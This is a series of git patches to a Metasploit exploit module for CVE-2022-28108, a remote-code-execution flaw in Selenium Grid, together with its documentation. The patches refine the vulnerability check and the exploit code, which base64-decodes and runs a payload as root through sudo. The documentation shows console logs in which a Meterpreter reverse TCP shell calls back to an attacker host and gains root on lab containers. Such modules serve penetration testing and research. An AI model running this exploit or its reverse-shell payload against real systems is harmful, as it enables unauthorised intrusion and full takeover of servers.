From: Takah1ro Date: Sat, 28 Dec 2024 14:39:24 +0900 Subject: [PATCH 12/23] Update vulnerable version --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.md | 3 ++- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md index 5bf8b097ecd6..4cd762e059b5 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -5,11 +5,12 @@ such as application/x-www-form-urlencoded, multipart/form-data, and text/plain. The vulnerability affects: - * Selenium Server (Grid) before 4 + * Selenium Server (Grid) before 4.0.0-alpha-7 This module was successfully tested on: * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 20.0.4 + * selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 20.0.4 ### Installation diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 56f3efcecf01..d0db957afd14 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -15,7 +15,7 @@ def initialize(info = {}) info, 'Name' => 'Selenium chrome RCE', 'Description' => %q{ - Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types + Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types such as application/x-www-form-urlencoded, multipart/form-data, and text/plain. }, 'Author' => [ From 9f20c575e5f02ff8f1b9ab4bfce9e3c3b49a19b7 Mon Sep 17 00:00:00 2001 From: Takahiro Yokoyama Date: Sat, 28 Dec 2024 14:40:44 +0900 Subject: [PATCH 13/23] Update modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb Improve version detection messaging Co-authored-by: bcoles --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index d0db957afd14..92e7d841fb51 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -80,8 +80,7 @@ def check return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable") end - print_status("Version #{version} detected, which is vulnerable") - Exploit::CheckCode::Appears + CheckCode::Appears("Version #{version} detected, which is vulnerable") end def exploit From 6577a18abb355a307fb6c6a45fdd3b79cf25ea94 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sat, 28 Dec 2024 15:04:35 +0900 Subject: [PATCH 14/23] Add response check --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 92e7d841fb51..2742383511a3 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -105,12 +105,13 @@ def exploit } }.to_json - send_request_cgi({ + res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'wd/hub/session'), 'headers' => { 'Content-Type' => 'text/plain' }, 'data' => body }) + fail_with(Failure::Unreachable, 'Connection failed') unless res end end From 86bd1c2938ee05abf3b4201469920216d80ab4d6 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 29 Dec 2024 12:19:19 +0900 Subject: [PATCH 15/23] Minor improve * enable fetch_delete * avoid using single quotes * update doc --- ...elenium_greed_chrome_rce_cve_2022_28108.md | 39 ++++++++++++++----- ...elenium_greed_chrome_rce_cve_2022_28108.rb | 5 ++- 2 files changed, 33 insertions(+), 11 deletions(-) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md index 4cd762e059b5..fdedbc428bd0 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -1,6 +1,6 @@ ## Vulnerable Application -Selenium Server (Grid) before 4 allows CSRF because it permits non-JSON content types +Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types such as application/x-www-form-urlencoded, multipart/form-data, and text/plain. The vulnerability affects: @@ -9,8 +9,8 @@ The vulnerability affects: This module was successfully tested on: - * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 20.0.4 - * selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 20.0.4 + * selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04 + * selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04 ### Installation @@ -33,6 +33,7 @@ This module was successfully tested on: ## Scenarios +### selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04 ``` msf6 > use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108 [*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp @@ -54,8 +55,8 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) - FETCH_DELETE false yes Attempt to delete the binary after execution - FETCH_FILENAME KPrNrswF no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_DELETE true yes Attempt to delete the binary after execution + FETCH_FILENAME jcInmtImuA no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload @@ -74,20 +75,38 @@ Exploit target: View the full module info with the info, or info -d command. -msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444 ForceExploit=true [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[*] Version 3.141.59 detected, which is vulnerable -[+] The target appears to be vulnerable. -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:58562) at 2024-12-28 11:15:06 +0900 +[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:46564) at 2024-12-29 12:14:52 +0900 meterpreter > getuid Server username: root meterpreter > sysinfo -Computer : 172.17.0.2 +Computer : 172.17.0.4 OS : Ubuntu 20.04 (Linux 6.8.0-51-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > ``` + +### selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04 +``` +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447 ForceExploit=true +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation. +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59162) at 2024-12-29 12:15:49 +0900 + +meterpreter > getuid +Server username: root +meterpreter > sysinfo +Computer : 172.17.0.5 +OS : Ubuntu 18.04 (Linux 6.8.0-51-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 2742383511a3..3e6429cfedbc 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -44,6 +44,9 @@ def initialize(info = {}) } ], ], + 'DefaultOptions' => { + 'FETCH_DELETE' => true + }, 'DefaultTarget' => 0, 'DisclosureDate' => '2022-04-18', 'Notes' => { @@ -86,7 +89,7 @@ def check def exploit b64encoded_payload = Rex::Text.encode_base64( "if sudo -n true 2>/dev/null; then\n"\ - " sudo su root -c '#{payload.encoded}'\n"\ + " echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d | sudo su root -c /bin/bash\n"\ "else\n"\ " #{payload.encoded}\n"\ "fi\n" From bbc282e90cbb58a6a7711986b659d8267c29fb7b Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Mon, 30 Dec 2024 13:36:15 +0900 Subject: [PATCH 16/23] Improve check --- ...elenium_greed_chrome_rce_cve_2022_28108.md | 18 ++++++++--------- ...elenium_greed_chrome_rce_cve_2022_28108.rb | 20 +++++++++++++++---- 2 files changed, 25 insertions(+), 13 deletions(-) diff --git a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md index fdedbc428bd0..21f9f50ea2cd 100644 --- a/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md +++ b/documentation/modules/exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108.md @@ -56,7 +56,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp): ---- --------------- -------- ----------- FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_DELETE true yes Attempt to delete the binary after execution - FETCH_FILENAME jcInmtImuA no Name to use on remote system when storing payload; cannot contain spaces or slashes + FETCH_FILENAME OmbNmrIU no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload @@ -75,16 +75,16 @@ Exploit target: View the full module info with the info, or info -d command. -msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444 ForceExploit=true +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444 [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable -[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:46564) at 2024-12-29 12:14:52 +0900 +[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable. +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:40990) at 2024-12-30 13:33:31 +0900 meterpreter > getuid Server username: root meterpreter > sysinfo -Computer : 172.17.0.4 +Computer : 172.17.0.5 OS : Ubuntu 20.04 (Linux 6.8.0-51-generic) Architecture : x64 BuildTuple : x86_64-linux-musl @@ -94,16 +94,16 @@ meterpreter > ### selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04 ``` -msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447 ForceExploit=true +msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4447 [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[!] Cannot reliably check exploitability. ForceExploit is enabled, proceeding with exploitation. -[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:59162) at 2024-12-29 12:15:49 +0900 +[!] The service is running, but could not be validated. Selenium Grid version 4.x detected. +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:34888) at 2024-12-30 13:34:30 +0900 meterpreter > getuid Server username: root meterpreter > sysinfo -Computer : 172.17.0.5 +Computer : 172.17.0.6 OS : Ubuntu 18.04 (Linux 6.8.0-51-generic) Architecture : x64 BuildTuple : x86_64-linux-musl diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 3e6429cfedbc..9ed89fa797d1 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -68,7 +68,19 @@ def check 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) - return Exploit::CheckCode::Unknown unless res&.code == 200 + if res&.code != 200 + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'status') + }) + if res && res.get_json_document && res.get_json_document.include?('value') && + res.get_json_document['value'].include?('message') && + res.get_json_document['value']['message'].downcase.include?('selenium grid') + return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') + end + + return Exploit::CheckCode::Unknown + end js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) } return Exploit::CheckCode::Unknown unless js_code @@ -80,10 +92,10 @@ def check # Extract the version version = Rex::Version.new(json_data['version']) if version == Rex::Version.new('4.0.0-alpha-7') || Rex::Version.new('4.0.1') <= version - return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable") + return Exploit::CheckCode::Safe("Version #{version} detected, which is not vulnerable.") end - CheckCode::Appears("Version #{version} detected, which is vulnerable") + CheckCode::Appears("Version #{version} detected, which is vulnerable.") end def exploit @@ -114,7 +126,7 @@ def exploit 'headers' => { 'Content-Type' => 'text/plain' }, 'data' => body }) - fail_with(Failure::Unreachable, 'Connection failed') unless res + fail_with(Failure::Unreachable, 'Connection failed.') unless res end end From 3a28df6b32cd511f583c440e9f9b0a7fab9f3a01 Mon Sep 17 00:00:00 2001 From: Takahiro Yokoyama Date: Sat, 4 Jan 2025 08:41:56 +0900 Subject: [PATCH 17/23] Apply suggestions from code review Co-authored-by: Diego Ledda --- .../http/selenium_greed_chrome_rce_cve_2022_28108.rb | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 9ed89fa797d1..28d52e533fb5 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -30,7 +30,6 @@ def initialize(info = {}) ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'], ], 'Payload' => { - 'DisableNops' => true }, 'Platform' => %w[linux], 'Targets' => [ @@ -83,10 +82,14 @@ def check end js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) } - return Exploit::CheckCode::Unknown unless js_code + return Exploit::CheckCode::Unknown('Unable to determine the version.') unless js_code json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1] - json_data = JSON.parse(json_str) + begin + json_data = JSON.parse(json_str) + rescue JSON::ParserError + return Exploit::CheckCode::Unknown('Unable to determine the version.') + end return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version'] # Extract the version From bf643041c338eda7b75de75a63c60c024ed1bffc Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sat, 4 Jan 2025 08:46:12 +0900 Subject: [PATCH 18/23] Rubocop formatting --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 28d52e533fb5..5b9d855a3844 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -29,8 +29,7 @@ def initialize(info = {}) ['URL', 'https://www.wiz.io/blog/seleniumgreed-cryptomining-exploit-attack-flow-remediation-steps'], ['URL', 'https://www.gabriel.urdhr.fr/2022/02/07/selenium-standalone-server-csrf-dns-rebinding-rce/'], ], - 'Payload' => { - }, + 'Payload' => {}, 'Platform' => %w[linux], 'Targets' => [ [ From 6cbb30c91a742e8e763c54c3a7230057f334b34c Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sat, 4 Jan 2025 09:11:24 +0900 Subject: [PATCH 19/23] Avoid the code nesting --- ...elenium_greed_chrome_rce_cve_2022_28108.rb | 28 +++++++++---------- 1 file changed, 14 insertions(+), 14 deletions(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 5b9d855a3844..4d383dcf1a3d 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -62,25 +62,25 @@ def initialize(info = {}) end def check - res = send_request_cgi({ + # Request for Selenium Grid version 3 + v3res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path) }) - if res&.code != 200 - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'status') - }) - if res && res.get_json_document && res.get_json_document.include?('value') && - res.get_json_document['value'].include?('message') && - res.get_json_document['value']['message'].downcase.include?('selenium grid') - return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') - end + # Request for Selenium Grid version 4 + v4res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'status') + }) + return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') if v3res&.code != 200 && + v4res && v4res.get_json_document && + v4res.get_json_document.include?('value') && + v4res.get_json_document['value'].include?('message') && + v4res.get_json_document['value']['message'].downcase.include?('selenium grid') - return Exploit::CheckCode::Unknown - end + return Exploit::CheckCode::Unknown('Unexpected server reply.') unless v3res&.code == 200 - js_code = res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) } + js_code = v3res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) } return Exploit::CheckCode::Unknown('Unable to determine the version.') unless js_code json_str = js_code.text.match(/var json = Object.freeze\('(.*?)'\);/)[1] From e2bf2162dcf4ceb2fe863f83f799f818736feb06 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sat, 4 Jan 2025 09:13:41 +0900 Subject: [PATCH 20/23] Update failure --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 4d383dcf1a3d..07655888c47b 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -128,7 +128,7 @@ def exploit 'headers' => { 'Content-Type' => 'text/plain' }, 'data' => body }) - fail_with(Failure::Unreachable, 'Connection failed.') unless res + fail_with(Failure::Unknown, 'Unexpected server reply.') unless res end end From 43294df0dd4397dd825e9f8ad256569cf1e710de Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sat, 4 Jan 2025 10:21:43 +0900 Subject: [PATCH 21/23] Add a message about what is failing --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index 07655888c47b..cb13c187e6b5 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -89,7 +89,7 @@ def check rescue JSON::ParserError return Exploit::CheckCode::Unknown('Unable to determine the version.') end - return Exploit::CheckCode::Unknown unless json_data && json_data.include?('version') && json_data['version'] + return Exploit::CheckCode::Unknown('Unable to determine the version.') unless json_data && json_data.include?('version') && json_data['version'] # Extract the version version = Rex::Version.new(json_data['version']) From 474f5426b5ff03cabcbda824eda49b5e004093a2 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Mon, 6 Jan 2025 19:11:27 +0900 Subject: [PATCH 22/23] Update check --- .../selenium_greed_chrome_rce_cve_2022_28108.rb | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index cb13c187e6b5..d66636c563e9 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -62,22 +62,21 @@ def initialize(info = {}) end def check - # Request for Selenium Grid version 3 - v3res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path) - }) # Request for Selenium Grid version 4 v4res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'status') }) - return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') if v3res&.code != 200 && - v4res && v4res.get_json_document && + return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') if v4res && v4res.get_json_document && v4res.get_json_document.include?('value') && v4res.get_json_document['value'].include?('message') && v4res.get_json_document['value']['message'].downcase.include?('selenium grid') + # Request for Selenium Grid version 3 + v3res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path) + }) return Exploit::CheckCode::Unknown('Unexpected server reply.') unless v3res&.code == 200 js_code = v3res.get_html_document.css('script').find { |script| script.text.match(/var json = Object.freeze\('(.*?)'\);/) } From 0f71c896e5d15cc2656b29522f1ecfdafc1e1be0 Mon Sep 17 00:00:00 2001 From: Diego Ledda Date: Tue, 7 Jan 2025 10:47:04 +0100 Subject: [PATCH 23/23] chore: removing PAYLOAD from DefaultOptions --- .../linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb index d66636c563e9..0df68c1f4119 100644 --- a/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb +++ b/modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb @@ -36,7 +36,7 @@ def initialize(info = {}) 'Linux Command', { 'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd, 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp', + # tested cmd/linux/http/x64/meterpreter_reverse_tcp 'FETCH_COMMAND' => 'WGET' } }